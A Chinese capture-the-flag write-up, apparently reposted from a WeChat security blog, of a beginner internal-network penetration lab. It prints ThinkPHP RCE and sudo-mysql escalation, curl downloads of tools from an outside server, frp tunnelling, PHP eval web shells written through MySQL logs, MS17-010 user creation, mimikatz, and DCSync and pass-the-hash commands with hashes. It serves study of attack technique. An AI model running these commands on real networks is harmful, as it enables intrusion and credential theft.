春秋云镜-Initial-WriteUp

WriteUp 5个月前 admin

46 0 0

：声明：该公众号分享的安全工具和项目均来源于网络，仅供安全研究与学习之用，如用于其他用途，由使用者承担全部法律及连带责任，与工具作者和本公众号无关

现在只对常读和星标的公众号才展示大图推送，建议大家把猫蛋儿安全“设为星标”，否则可能看不到了！

靶场简介

Initial是一套难度为简单的靶场环境，完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag，各部分位于不同的机器上。

春秋云镜-Initial-WriteUp

获取入口机权限

通过fscan对目标ip进行扫描

./fscan_darwin -h 39.98.209.209

发现存在tp5 rce，通过工具成功一键利用

通过sudo提权获得flag01：flag{60b53231-

sudo -lsudo /usr/bin/mysql -e '! cat /root/flag/flag01.txt'

内网横向

使用fscan对当前c段进行扫描

curl http://39.98.170.21:8001/fscan_amd64 --output fscanchmod +x ./fscan./fscan -h 172.22.2.1/24

172.22.1.18:3306 open172.22.1.18:445 open172.22.1.21:445 open172.22.1.2:445 open172.22.1.18:139 open172.22.1.21:139 open172.22.1.2:139 open172.22.1.18:135 open172.22.1.21:135 open172.22.1.15:22 open172.22.1.2:135 open172.22.1.18:80 open172.22.1.2:88 open172.22.1.15:80 open[*]172.22.1.2   [->]DC01   [->]172.22.1.2[+] 172.22.1.21    MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)[*] NetInfo:[*]172.22.1.18   [->]XIAORANG-OA01   [->]172.22.1.18[*] NetInfo:[*]172.22.1.21   [->]XIAORANG-WIN7   [->]172.22.1.21[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 [*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 [*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

frp内网穿透，进入目标内网

curl http://vpsip:8001/frpc --output frpccurl http://vpsip:8001/frpc.ini --output frpc.ininohup ./frpc -c frpc.ini

通过前面探测发现http://172.22.1.18为信呼OA，通过路径扫描发现存在phpmyadmin接口

该OA存在历史漏洞：https://blog.csdn.net/solitudi/article/details/118675321，只需要在该脚本同目录下创建一个php一句话木马即可：<?php eval($_GET["1"]);?>;

对phpadmin经过尝试发现可以通过root/root进行登录，这时候可以通过mysql日志写马的方式来getshell;

show variables like 'general%';查看是否开启日志以及存放的日志位置

开启日志并写入一句话木马

set global general_log = ON;开启日志set global general_log_file = "c:/phpStudy/PHPTutorial/www/1.php"select '<?php eval($_POST[shell]);?>'

通过蚁剑进行连接

在C:/Users/Administrator/flag/flag02.txt获得flag02

flag02：2ce3-4813-87d4-

172.22.1.21存在17010，通过利用工具添加用户test:test@123!，并将test用户添加到本地管理员组当中。

后续通过test用户rdp到用户桌面，使用mimikatz抓取lsass凭证，获取XIAORANG-WIN7$的hash

XIAORANG-WIN7$/d4df8a3fa73a9fee14a62123784290c6

随后通过bloodhound分析后发现XIAORANG-WIN7$对域内拥有dcsync权限

通过XIAORANG-WIN7$的凭证进行dcsync

python3 secretsdump.py [email protected] -just-dc-user administrator -hashes :d4df8a3fa73a9fee14a62123784290c6

利用administrator的凭证对dc进行远程连接

python3 wmiexec.py xiaorang/[email protected] -hashes :10cf89a850fb1cdbe6bb432b859164c8

在dc上获取flag03：e8f88d0d43d6}

整个flag：flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

关于我们

持续从基础到深入的更新攻防文章

点击下方名片进入公众号，欢迎关注！

点个小赞你最好看

原文始发于微信公众号（猫蛋儿安全）：春秋云镜-Initial-WriteUp

版权声明：admin 发表于 2023年12月1日上午9:03。
转载请注明：春秋云镜-Initial-WriteUp | CTF导航

看雪2022 KCTF 春季赛 | 第三题设计思路及解析

admin

731

关于迷宫题的一些求解思路

admin

看雪·众安 2021 KCTF 秋季赛 | 第五题设计思路及解析

admin

1,023

冠军Writeup大放送 | DataCon2022域名体系安全赛道之“NDNS”战队

admin

547

看雪2022 KCTF 秋季赛 | 第八题设计思路及解析

admin

523

Hack.lu 2023 两道k8s题解

admin

233

暂无评论

您必须登录才能参与评论！

立即登录

暂无评论...

春秋云镜-Initial-WriteUp

【卫星安全系列一】HAS-beckley赛题复现

【卫星安全系列二】HAS-BUS赛题复现

相关文章

暂无评论

相关文章

春秋云镜-Initial-WriteUp

【卫星安全系列一】HAS-beckley赛题复现

【卫星安全系列二】HAS-BUS赛题复现

相关文章

暂无评论

广告位

相关文章